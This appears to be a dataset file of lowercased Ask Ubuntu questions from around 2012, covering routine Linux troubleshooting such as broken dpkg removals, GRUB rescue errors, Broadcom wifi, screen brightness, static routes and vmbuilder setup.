167991	how to force remove a package if dpkg removal script fails ?	i 'm trying to remove a package where i deleted the /etc/init.d/disco-master file ( in an attempt to remove the package manually ) . i want to remove the disco-master package . how do i do this now ? this is what happens when i do sudo apt-get remove disco-master : removing disco-master ... invoke-rc.d : unknown initscript , /etc/init.d/disco-master not found . dpkg : error processing disco-master ( -- remove ) : subprocess installed pre-removal script returned error exit status 100 errors were encountered while processing : disco-master e : sub-process /usr/bin/dpkg returned an error code ( 1 ) when i do sudo apt-get install -- reinstall disco-master i get the following : you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : disco-master : depends : disco-node ( = 0.4.2+nmu1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . when i do sudo apt-get -f install i get this : unpacking disco-node ( from ... /disco-node_0.4.2+nmu1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/disco-node_0.4.2+nmu1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/disco/master/ebin/disco.app ' , which is also in package disco-master 0.4.1 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/disco-node_0.4.2+nmu1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) when i run sudo apt-get remove disco-node i get the following : package disco-node is not installed , so not removed you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : disco-master : depends : disco-node ( = 0.4.1 ) but it is not going to be installed depends : python-disco ( = 0.4.1 ) but 0.4.2+nmu1 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . when i did sudo dpkg -p -- force-all disco-master i got : removing disco-master ... invoke-rc.d : unknown initscript , /etc/init.d/disco-master not found . dpkg : error processing disco-master ( -- purge ) : subprocess installed pre-removal script returned error exit status 100 errors were encountered while processing : disco-master
168005	saving changes when booting from usb drive 12.04 desktop	i downloaded version 12.04 desktop then loaded on a usb so i can boot a wyse thin client with no os . i can boot the device with the usb key and everything looks fine but when i open the remmina remote desktop client and enter the ip and other setting i ca n't get them to save after a reboot . same thing happens when i create a text document , i save it to a folder but after a reboot it 's gone . i am a newbie to this product and this may not be possible , please point me in the right direction of you can please . thanks ,
168007	how to install openoffice ?	first of all . i have a question , that deals with openoffice suite/program . i am trying to figure out how to instal openoffice suite . i went to the website and download and clicked linux the tar.gz file format . i downloaded it . i put the file in my home directory . i tried to install/extract it with the terminanal it work . but i do n't see it on my desktop or with the hud . i have done some research toward doing it a differnt way but i do n't trust the site . click on the link on here , it seems safe but it 's maybe just me . there are some website here they are http : //www.ubuntubuzz.com/ ... /install-oracle-openoffice-33-from-ppa.html http : //www.upubuntu.com/2012/05/how-to-install-apache-openoffice-34-via.html i you have any input toward how to do it install it / run it . i would appericate the help .
168009	is there a disk defragger for ntfs file systems ?	i have a couple ntsf disks i 'd like to defrag without having to log into my windows partition . is there a program for ubuntu that does disk defraggin ? thanks for the help .
168012	how to remove the web app shortcut created by chromium ?	i use chromium 's create application shortcut feature and when i opted to make the shortcut , i chose to not make a desktop icon and have it only appear in the application menu . all fine it is there in the menu now but i want to remove it , how do i do that ? ? just wanted to check the new web app integration feature but this is just a shortcut : /
168021	remove ubuntu login screen from xubuntu 12.04	i fresh installed ubuntu 12.04 then recently installed xubuntu-desktop on top of it as i do n't like unity 's slowness . still when logging in it shows ubuntu style login screen . now i want to bring xubuntu style login screen . how can i do it ?
168026	how to configure sudo ?	this will probably be a short and informative question . all the time i have heard and seen people talking about how you can customize sudo so you can adjust the 15 min reset , and add a custom query for the password . i myself would like to know how , and do this ( at least on debian based systems ) . i have duckduckgo 'd it and i could n't find anything except the `` sudoers file '' in /etc/sudoers , which i have n't found a way to adjust or configure anything from there . can anyone tell me the file or where i can configure these settings ?
168030	is the alteration in appearance of indicators in the menu-bar when dash or hud is being used an intended feature ?	if the change in appearance is intentional , will someone kindly point me to some reading material about why it is so ? edit : i have n't installed ccsm or fiddled with compiz settings . normal with the dash open with the hud open
168032	how to disable built-in wifi and use only usb wifi card ?	the built-in wifi card in my laptop ( dell xps m1330 ) is crap , pretty much . i have an asus usb wifi card which is significantly better , and it works fine . what i 'd like to do is disable the built-in wifi card . is there a way to do this ( without having to boot into bios each time i want to disable/enable the built-in wireless ) ? @ mikewhatever : here are those outputs matt @ sbod : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 0b05:179d asustek computer , inc . bus 002 device 004 : id 05a9:2640 omnivision technologies , inc. ov2640 webcam bus 007 device 002 : id 0483:2016 sgs thomson microelectronics fingerprint reader matt @ sbod : ~ $ lspci -nnk | grep -ia2 net 09:00.0 ethernet controller [ 0200 ] : broadcom corporation netlink bcm5906m fast ethernet pci express [ 14e4:1713 ] ( rev 02 ) subsystem : dell xps m1330 [ 1028:0209 ] kernel driver in use : tg3 -- 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) subsystem : dell wireless 1395 wlan mini-card [ 1028:000b ] kernel driver in use : wl
168033	how to set static routes in 12.04 server	i have used ubuntu since ubuntu 8.10 ; today i 'm working with ubuntu 12.04 server . i am having difficulty keeping static routes on booting . i would usually put the route commands /sbin/route add -net < ip > / < mask > < gw > dev < ethx > in /etc/rc.local or i would create a file ( named routes ) inside the directory /etc/network/if-up/ , but i notice that on ubuntu 12.04 it is n't working . if i type the commands in the shell , they work , but the same commands do n't work when they are in the specified file . i already tried to change the file name to other names thinking that my file name ( routes ) could be erroneous in ubuntu 12.04 , but that also did not work . i notice also that command /sbin/ifconfig works , less the /sbin/route . what changed in network set-up ? how can i define static routes on ubuntu 12.04 ?
168034	how can i install ubuntu on a ibm thinkpad with a usb ?	i would like to know the steps to follow to install ubuntu on a ibm thinkpad with a usb please . i would like to replace completly with ubuntu ( no windows ) .
168038	remote desktop ( vino-server ) connects but display does n't work ?	ubuntu comes default with vino-server , i can remote into my machine , and connect to it , however , the display inside my remote client , is a mirror of my own desktop . i tried using one monitor , thinking that 's what is the issue but still wo n't work . ( vino-server:3608 ) : eggsmclient-critical ** : egg_sm_client_set_mode : assertion `global_client == null || global_client_mode == egg_sm_client_mode_disabled ' failed 25/07/2012 12:23:58 pm autoprobing tcp port in ( all ) network interface 25/07/2012 12:23:58 pm listening ipv6 : // [ : : ] :5900 25/07/2012 12:23:58 pm listening ipv4 : //0.0.0.0:5900 25/07/2012 12:23:58 pm autoprobing selected port 5900 25/07/2012 12:23:58 pm advertising security type : 'tls ' ( 18 ) 25/07/2012 12:23:58 pm re-binding socket to listen for vnc connections on tcp port 5900 in ( all ) interface 25/07/2012 12:23:58 pm listening ipv6 : // [ : : ] :5900 25/07/2012 12:23:58 pm listening ipv4 : //0.0.0.0:5900 25/07/2012 12:23:58 pm clearing securitytypes 25/07/2012 12:23:58 pm advertising security type : 'tls ' ( 18 ) 25/07/2012 12:23:58 pm clearing securitytypes 25/07/2012 12:23:58 pm advertising security type : 'tls ' ( 18 ) 25/07/2012 12:23:58 pm advertising authentication type : 'no authentication ' ( 1 ) 25/07/2012 12:23:58 pm re-binding socket to listen for vnc connections on tcp port 5900 in ( all ) interface 25/07/2012 12:23:58 pm listening ipv6 : // [ : : ] :5900 25/07/2012 12:23:58 pm listening ipv4 : //0.0.0.0:5900 25/07/2012 12:23:58 pm clearing securitytypes 25/07/2012 12:23:58 pm clearing authtypes 25/07/2012 12:23:58 pm advertising security type : 'tls ' ( 18 ) 25/07/2012 12:23:58 pm advertising authentication type : 'vnc authentication ' ( 2 ) 25/07/2012 12:23:58 pm clearing securitytypes 25/07/2012 12:23:58 pm clearing authtypes 25/07/2012 12:23:58 pm advertising security type : 'tls ' ( 18 ) 25/07/2012 12:23:58 pm advertising authentication type : 'vnc authentication ' ( 2 ) 25/07/2012 12:23:58 pm advertising security type : 'vnc authentication ' ( 2 ) ( vino-server:3608 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( vino-server:3608 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . 25/07/2012 12:24:16 pm [ ipv4 ] got connection from client static-xxxx.bltmmd.fios.verizon.net 25/07/2012 12:24:16 pm other clients : 25/07/2012 12:24:29 pm client protocol version 3.7 25/07/2012 12:24:29 pm advertising security type 18 25/07/2012 12:24:29 pm advertising security type 2 25/07/2012 12:24:30 pm client returned security type 18 25/07/2012 12:24:30 pm advertising authentication type 2 25/07/2012 12:24:30 pm client returned authentication type 2 25/07/2012 12:24:37 pm rfbprocessclientnormalmessage : ignoring unknown encoding type -258 25/07/2012 12:24:37 pm enabling newfbsize protocol extension for client static-xxxx.bltmmd.fios.verizon.net 25/07/2012 12:24:37 pm rfbprocessclientnormalmessage : ignoring unknown encoding type 1464686185 25/07/2012 12:24:37 pm rfbprocessclientnormalmessage : ignoring unknown encoding type -259 25/07/2012 12:24:37 pm rfbprocessclientnormalmessage : ignoring unknown encoding type -257 ( vino-server:3608 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . 25/07/2012 12:24:55 pm client static-xxxx.bltmmd.fios.verizon.net gone 25/07/2012 12:24:55 pm statistics : 25/07/2012 12:24:55 pm key events received 0 , pointer events 80 25/07/2012 12:24:55 pm framebuffer updates 43 , rectangles 152 , bytes 292401 25/07/2012 12:24:55 pm tight rectangles 152 , bytes 292401 25/07/2012 12:24:55 pm raw bytes equivalent 11621332 , compression ratio 39.744502 25/07/2012 12:25:21 pm [ ipv4 ] got connection from client static-xxxx.bltmmd.fios.verizon.net 25/07/2012 12:25:21 pm other clients : 25/07/2012 12:25:28 pm client protocol version 3.7 25/07/2012 12:25:28 pm advertising security type 18 25/07/2012 12:25:28 pm advertising security type 2 25/07/2012 12:25:28 pm client returned security type 18 25/07/2012 12:25:29 pm advertising authentication type 2 25/07/2012 12:25:29 pm client returned authentication type 2 25/07/2012 12:25:37 pm rfbprocessclientnormalmessage : ignoring unknown encoding type -258 25/07/2012 12:25:37 pm enabling newfbsize protocol extension for client static-xxxx.bltmmd.fios.verizon.net 25/07/2012 12:25:37 pm rfbprocessclientnormalmessage : ignoring unknown encoding type 1464686185 25/07/2012 12:25:37 pm rfbprocessclientnormalmessage : ignoring unknown encoding type -259 25/07/2012 12:25:37 pm rfbprocessclientnormalmessage : ignoring unknown encoding type -257 ( vino-server:3608 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . 25/07/2012 12:25:47 pm client static-xxxx.bltmmd.fios.verizon.net gone 25/07/2012 12:25:47 pm statistics : 25/07/2012 12:25:47 pm key events received 0 , pointer events 7283 25/07/2012 12:25:47 pm framebuffer updates 27 , rectangles 82 , bytes 113354 25/07/2012 12:25:47 pm tight rectangles 82 , bytes 113354 25/07/2012 12:25:47 pm raw bytes equivalent 5831432 , compression ratio 51.444431 couple of things i notice , the following error occurs over and over again . the menu error seems to be caused by ubuntu , similar problems occur http : //trac.wxwidgets.org/ticket/14292 , ( vino-server:3608 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . the second one also seem to be a display related issue , ca n't seem to figure out a solution . i really rather try to fix this issue than have to use the other vnc clients most suggest . ( vino-server:3608 ) : eggsmclient-critical ** : egg_sm_client_set_mode : assertion `global_client == null || global_client_mode == egg_sm_client_mode_disabled ' failed
168039	how to prevent nautilus from starting in kde ?	i have kde installed in ubuntu ( not kubuntu ) and the nautilus starts with it . but it should start only in gnome or unity : $ grep onlyshowin /etc/xdg/autostart/nautilus-autostart.desktop onlyshowin=gnome ; unity ; uninstalling nautilus or saving the kde session is not an option . it should not start at all .
168042	how can i give a user permission to open low port numbers ?	if i 'm root , how can i give a user permission to open low port numbers ? or how can i take away the right to open high port numbers from a user ?
168044	why compressed directories can not be extracted in /opt ?	i am not able to uncompress a file with .tar.gz extension did sudo tar -xvzf ~/downloads/file.tar.gz /opt/ but no success . it says : tar : /opt : not found in archive tar : exiting with failure status due to previous errors
168051	does anyone create some personalized ubuntu webapps userscript following the walkthrough posted on the bazaar directory of the project ?	i 'm beggining to read the walkthrough to create to userscript to use with greasemonkey and ubuntu webapps , and i 'm wondering if there 's a post or a directory which centralized all those scripts that could be very interesting to use . it could be useful to avoid to recreate the same webapps too many times .
168053	how to install all the boost development libraries ?	i am having trouble installing boost library completely it fails/skips several things that seem to be key for me to continue on to compiling a program with it . here is what i get when i install boost , gcc.compile.c++ bin.v2/libs/iostreams/build/gcc-4.6/release/threading-multi/bzip2.o libs/iostreams/src/bzip2.cpp:20:56 : fatal error : bzlib.h : no such file or directory compilation terminated . `` g++ '' -ftemplate-depth-128 -o3 -finline-functions -wno-inline -wall -pthread -fpic -dboost_all_no_lib=1 -dboost_iostreams_dyn_link=1 -dboost_iostreams_use_deprecated -dndebug -i '' . '' -c -o `` bin.v2/libs/iostreams/build/gcc-4.6/release/threading-multi/bzip2.o '' `` libs/iostreams/src/bzip2.cpp '' ... failed gcc.compile.c++ bin.v2/libs/iostreams/build/gcc-4.6/release/threading-multi/bzip2.o ... ... skipped < pbin.v2/libs/iostreams/build/gcc-4.6/release/threading-multi > libboost_iostreams.so.1.50.0 for lack of < pbin.v2/libs/iostreams/build/gcc-4.6/release/threading-multi > bzip2.o ... ... skipped < p/usr/local/lib > libboost_iostreams.so.1.50.0 for lack of < pbin.v2/libs/iostreams/build/gcc-4.6/release/threading-multi > libboost_iostreams.so.1.50.0 ... ... skipped < p/usr/local/lib > libboost_iostreams.so for lack of < p/usr/local/lib > libboost_iostreams.so.1.50.0 ... gcc.compile.c++ bin.v2/libs/iostreams/build/gcc-4.6/release/link-static/threading-multi/bzip2.o libs/iostreams/src/bzip2.cpp:20:56 : fatal error : bzlib.h : no such file or directory compilation terminated . `` g++ '' -ftemplate-depth-128 -o3 -finline-functions -wno-inline -wall -pthread -dboost_all_no_lib=1 -dboost_iostreams_use_deprecated -dndebug -i '' . '' -c -o `` bin.v2/libs/iostreams/build/gcc-4.6/release/link-static/threading-multi/bzip2.o '' `` libs/iostreams/src/bzip2.cpp '' ... failed gcc.compile.c++ bin.v2/libs/iostreams/build/gcc-4.6/release/link-static/threading-multi/bzip2.o ... ... skipped < pbin.v2/libs/iostreams/build/gcc-4.6/release/link-static/threading-multi > libboost_iostreams.a ( clean ) for lack of < pbin.v2/libs/iostreams/build/gcc-4.6/release/link-static/threading-multi > bzip2.o ... ... skipped < pbin.v2/libs/iostreams/build/gcc-4.6/release/link-static/threading-multi > libboost_iostreams.a for lack of < pbin.v2/libs/iostreams/build/gcc-4.6/release/link-static/threading-multi > bzip2.o ... ... skipped < p/usr/local/lib > libboost_iostreams.a for lack of < pbin.v2/libs/iostreams/build/gcc-4.6/release/link-static/threading-multi > libboost_iostreams.a ... ... failed updating 2 targets ... ... skipped 6 targets ... ive tried re-installing zlib , and other archive tools like bzip2 but no luck .
168055	wireless does not work on hp dv6000 with a bcm4311	wireless does not work on hp dv6000 with ubuntu 12.04 i have been trying just about anything and i am stuck now . below are some terminal copy/pastes that couls be useful , if more are needed please tell me wich ones lsmod yields : module size used by snd_hda_codec_conexant 52516 1 joydev 17393 0 hp_wmi 13652 0 sparse_keymap 13658 1 hp_wmi snd_hda_intel 32765 2 snd_hda_codec 109562 2 snd_hda_codec_conexant , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec snd_pcm 80845 2 snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 snd_rawmidi 25424 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51567 2 snd_seq_midi , snd_seq_midi_event snd_timer 28931 2 snd_pcm , snd_seq snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq parport_pc 32114 0 rfcomm 38139 0 bnep 17830 2 bluetooth 158438 10 rfcomm , bnep ppdev 12849 0 nouveau 712356 3 snd 62064 13 snd_hda_codec_conexant , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device psmouse 72919 0 serio_raw 13027 0 k8temp 12905 0 soundcore 14635 1 snd snd_page_alloc 14108 2 snd_hda_intel , snd_pcm ttm 65344 1 nouveau nv_tco 13399 0 drm_kms_helper 45466 1 nouveau drm 197692 5 nouveau , ttm , drm_kms_helper i2c_nforce2 12906 0 i2c_algo_bit 13199 1 nouveau mxm_wmi 12859 1 nouveau wmi 18744 2 hp_wmi , mxm_wmi video 19068 1 nouveau mac_hid 13077 0 lp 17455 0 parport 40930 3 parport_pc , ppdev , lp usbhid 41906 0 hid 77367 1 usbhid forcedeth 58096 0 sata_nv 23360 2 pata_amd 13750 0 rfkill list all yields : 0 : hp-wifi : wireless lan soft blocked : no hard blocked : yes lspci yields : 00:00.0 ram memory : nvidia corporation c51 host bridge ( rev a2 ) 00:00.1 ram memory : nvidia corporation c51 memory controller 0 ( rev a2 ) 00:00.2 ram memory : nvidia corporation c51 memory controller 1 ( rev a2 ) 00:00.3 ram memory : nvidia corporation c51 memory controller 5 ( rev a2 ) 00:00.4 ram memory : nvidia corporation c51 memory controller 4 ( rev a2 ) 00:00.5 ram memory : nvidia corporation c51 host bridge ( rev a2 ) 00:00.6 ram memory : nvidia corporation c51 memory controller 3 ( rev a2 ) 00:00.7 ram memory : nvidia corporation c51 memory controller 2 ( rev a2 ) 00:02.0 pci bridge : nvidia corporation c51 pci express bridge ( rev a1 ) 00:03.0 pci bridge : nvidia corporation c51 pci express bridge ( rev a1 ) 00:05.0 vga compatible controller : nvidia corporation c51 [ geforce go 6150 ] ( rev a2 ) 00:09.0 ram memory : nvidia corporation mcp51 host bridge ( rev a2 ) 00:0a.0 isa bridge : nvidia corporation mcp51 lpc bridge ( rev a3 ) 00:0a.1 smbus : nvidia corporation mcp51 smbus ( rev a3 ) 00:0a.3 co-processor : nvidia corporation mcp51 pmu ( rev a3 ) 00:0b.0 usb controller : nvidia corporation mcp51 usb controller ( rev a3 ) 00:0b.1 usb controller : nvidia corporation mcp51 usb controller ( rev a3 ) 00:0d.0 ide interface : nvidia corporation mcp51 ide ( rev f1 ) 00:0e.0 ide interface : nvidia corporation mcp51 serial ata controller ( rev f1 ) 00:10.0 pci bridge : nvidia corporation mcp51 pci bridge ( rev a2 ) 00:10.1 audio device : nvidia corporation mcp51 high definition audio ( rev a2 ) 00:14.0 bridge : nvidia corporation mcp51 ethernet controller ( rev a3 ) 00:18.0 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control 03:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) sudo lshw -c network yields : *-network unclaimed description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : b6000000-b6003fff
168064	how do i set up the brightnes control on a toshiba satellite l650 ?	after upgrading ubuntu 11.10 to 12.04 i have lost control of brightness of my toshiba satellite l650 . under ubuntu 11.10 all worked ok. now i can change brightness only in terminal using : echo 3 > /sys/class/backlight/acpi_video0/brightness i have also folder named /sys/class/backlight/toshiba/ and in it there is file brightness when i use my keyboard shortcut fn-f6 and fn-f7 value in file brightness ( from toshiba folder ) changes , but brightness in computer not , because it seems to be controlled by value in /acpi_video0/ folder . i tried to change configuration in grub from this : grub_cmdline_linux= '' '' to this : grub_cmdline_linux= '' acpi_backlight=vendor '' but then folder /toshiba/ disappeared , and i can not change brightness even in terminal . acpi is installed . could anyone help me to find solution ? lspci gives following output : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati madison [ radeon hd 5000m series ] 01:00.1 audio device : advanced micro devices [ amd ] nee ati redwood hdmi audio [ radeon hd 5000 series ] 02:00.0 ethernet controller : atheros communications inc. ar8152 v1.1 fast ethernet ( rev c1 ) 03:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) 3f:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) 3f:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) 3f:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) 3f:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) 3f:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) 3f:02.3 host bridge : intel corporation core processor reserved ( rev 02 )
168069	problem installing vim	i tried installing vim using terminal command sudo apt-get install vim but it did n't installed and it showed the following message : you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : flashplugin-installer : breaks : flashplugin-downloader ( < 11.1.102.55ubuntu3 ) but 11.0.1.152ubuntu1 is to be installed vim : depends : vim-common ( = 2:7.3.429-2ubuntu2.1 ) but 2:7.3.429-2ubuntu2 is to be installed depends : vim-runtime ( = 2:7.3.429-2ubuntu2.1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . even if i try using apt-get -f to install , it did n't work . please provide a proper solution for this .
168073	try to boot up wubi , get black screen of death	i 'm sure others have had this issue , but when i try to book up wubi i get a flash of `` prefix not set '' then it seems to be booting normally . then the screen goes completely black and stays that way . i am essentially computer illiterate , so are there any solutions to this that i could use without completely screwing up my computer ? ( it 's an asus eee netbook , by the way . ) many thanks .
168081	problem installing ubuntu after installing windows 7	i first installed windows 7 ultimate onto my machine and using windows 7 built-in partitioning system , i had partitioned my disk into many smaller disks of ntfs file systems . i then tried to install ubuntu 12.04 onto my machine . i had installed ubuntu and windows 7 side by side because i needed both the operating system but while booting i was getting an error as attention out of range h:92.6khz v:58.2hz i was not getting any dual boot menu no msg was seen except the above message . i tried to press the down arrow thinking that it might take me to the option . first time it directly logged into ubuntu then next time windows 7 . when i logged into windows 7 , i deleted the volume in which ubuntu was installed . now , i am getting the error as error : unknown file system grub rescue > i want windows 7 back and a better way to install both operating systems . please give me some help in this regards .
168089	how do i install my new canon mg5250 printer ? ( mg5200 series )	i just bought a canon mg5250 multifunction printer because i thought that it would work well with ubuntu , but it 's hard to get it to work . how do i install this printer ?
168097	how to start and stop a task using at command ?	i want to start download using aria2c everyday at 02:00 am and stop it at 08:00 am . i know i should use at 02:00 at > aria2c ... . i do n't know how to tell 'at ' to stop it ! actually aria2c stops downloading with ctrl+c and i do n't know how to tell this to 'at ' ! and when aria2c starts downloading at the given time , it runs at the backgrounds and i do n't know how to stop it manually either ! any suggestions ? by the way , is there any way to do this automatically ? i mean create some sort of scheduled task to do it every day .
168101	why ca n't i access super-user mode with su ?	i just have managed to install lubuntu 12.04 . now i want to do some things in the terminal like installing and configuring the apache and a lamp-system among other things . i come from open suse world and there , i usually get access to the super-user-mode in the terminal by typing the command su . but if i do that in lubuntu , i am asked for the password and when i enter my password that i use to access the system , i get this error message ( translated from german ) : su : error with the authentication what should i do now ?
168102	error : no such partition . grub rescue	i had multiboot windows 7 and ubuntu on my samsung notebook np305u1a-a07in . i uninstalled ubuntu by deleting all unnamed partitions from windows disk partitions as i read on net somewhere . now i guess ubuntu is gone but i ca n't boot into windows anymore . whenever i boot it says error : no such partition grub rescue > i know my windows partition and data is all there . something is wrong with boot loader or boot manager . as i have notebook it does n't have dvd driver . but i have created usb stick of windows and ubuntu too . but my bios menu ca n't recognize or load these sticks at all . i tried it on other notebook it works . but not on this one only . i even changed priorities.but it says boot override and shows two options only to boot hdd and network . i checked a lot of forums and here too . but no solutions so far . i ca n't boot any usb stick so windows command prompt solution from recovery is no use . i have another doubt if these manufacturers lock bios to boot from another usb or dvd . but i installed ubuntu from usb itself and now it ca n't detect any of those . i do n't want to lose any data . anything will work windows or linux now . at least let me know the way i can bring windows installation on it .
168107	system volume setting muted when headphones unplugged , but normal with headphones in ?	my system volume is muted in general , but when i plug in my headphones , the volume gets set to about 50 % of its range . if i change the system volume to another value , the volume still gets reset when i plug in my headphones . it is as if i have 2 distinct volume settings , the main one getting overridden by the other when headphones are plugged in . is this normal behaviour ? is there a way i can change it so that volume is the same regardless of what is plugged in or not ?
168109	is it impossible to update 9.10 since it is no longer supported ?	my organization has a server that has been running karmic for a long time . i 'm working on a replacement server using 12.04 precise but before i make the switch i wanted to install the chef client on the box so i could tie it into a nagios package and monitor it . following the instructions on this page i get to the point where i try and do : sudo apt-get install opscode-keyring to which the system responds opscode-keyring : depends : apt ( > = 0.7.25 ) but 0.7.23.1ubuntu2 is to be installed i 'm assuing that means run apt-get update & & apt-get upgrade to get the newer version of apt before trying to install that package . of course doing that throws lots of not found errors : failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3 \- client_3.1.2-1ubuntu7.3_i386.deb 404 not found these boxes are running on amazon ec2 i get that this version is no longer `` supported '' and i 'm trying to stop using it - but does that mean in the ubuntu world that after the last day of support for a version it just ceases to be able to install any of the updates ? also , is there any way to force-upgrade something like karmic with the latest patches that were available before it was at end of life cycle ?
168115	how can i have a shell for git like in windows ?	when i use windows , the shell ( even a standard windows shell ) shows basic information about the git repository when you are in a git repository . things like the active branch and maybe some color coding . is there a way to have the same in ubuntu ?
168117	how to automatically add meta-tags to screenshot ?	i was wondering if there is a way to automatically add a given meta-tag to the screen-shots taken on pressing print screen key . it would really be a time-saver because i upload many screen-shots to my blog regularly . it will avert the need of adding tags manually to all screen-shots .
168118	running windows on a virtual machine for portability in case my laptop goes bellyup	i work as a software consultant who works primarily in the windows environment . my laptop is my lifeline and i can ill-afford any downtime if it goes belly up . somebody suggested running windows in a virtual machine in ubuntu , and should my primary laptop goes down , take the vm file to my backup machine and viola ! i am in business . but a lot of posts about the setup i am looking at point to significant performance degradation which i ca n't afford with a memory hog that is visual studio . i am open to ideas .
168127	in ubuntu 12.04 , how can i fix application icons to the panel ? and a question about tomboy	sometimes , i really like to put quick launch apps in the panel like vlc player to play my music just by one click . sometimes , i like to keep tomboy in the panel to be in hand . but i do n't know how to do that ! another point . in windows 7 , there is a small application called sticky notes i 'm sure you guys know . the most important feature that it can be stuck to the desktop holding important things to remember . does tomboy do such a thing , or there is another app ? ! thank you !
168131	how to list folders horizontally , like ios , in unity launch bar	it 's possible to create a folders like ios in unity launch bar ? i mean , you can click on an icon , and then icons will appear horizontal with a few icons . this could save space on unity launch bar . and i would like to know if these space saving solutions are available .
168142	are there any tutorials and books to get accustomed to the terminal ?	i want to use my ubuntu computer with text-based system . but i can find only some tutorials . i need more tutorials and books .
168144	multiple workspace rows in xfce without xfce-panel ?	is there a way to set the number of rows for desktop workspaces without using the xfce-panel applet `` workspace switcher '' ? i donât run xfce-panel at all , preferring to use cairo-dock .
168147	specifying a local iso to vmbuilder for kvm	i am trying to specify a local .iso image of the ubuntu os i would like to use to create a virtual machine of . according to vmbuilder kvm ubuntu -- help , ( and this post ) you are allowed to specify an .iso file instead of using a mirror . i have downloaded my own copy of ubuntu desktop 12.04 i386 from ubuntu.com and tried to specify it like so vmbuilder kvm ubuntu -- suite=precise -- arch=i386 -o -- flavour=server -- iso=/home/fred/desktop/ubuntu-12.04-desktop-i386.iso -- libvirt=qemu : ///system -- ip=192.168.1.39 -- gw=192.168.1.254 -- part=vmbuilder.partition -- templates=mytemplates -- user=fred -- name=fred -- pass=password -- mem=1024 -- cpu=1 -- hostname=vm1 -- bridge=br0 i have tried replacing -- flavour=server with -- flavour=desktop , -- flavour=virtual and nothing at all . the help command states `` -- iso=path this requires suite and kernel parameter to match what is available on the iso , obviously. '' which makes me think i could be getting the -- flavour or -- suite option wrong though i do n't understand how or why . i ran it with the -- debug command and pasted the output on pastebin here . mainly it 's failing to create the image because : failure trying to run : chroot /tmp/tmp6ufexa mount -t proc proc /proc .
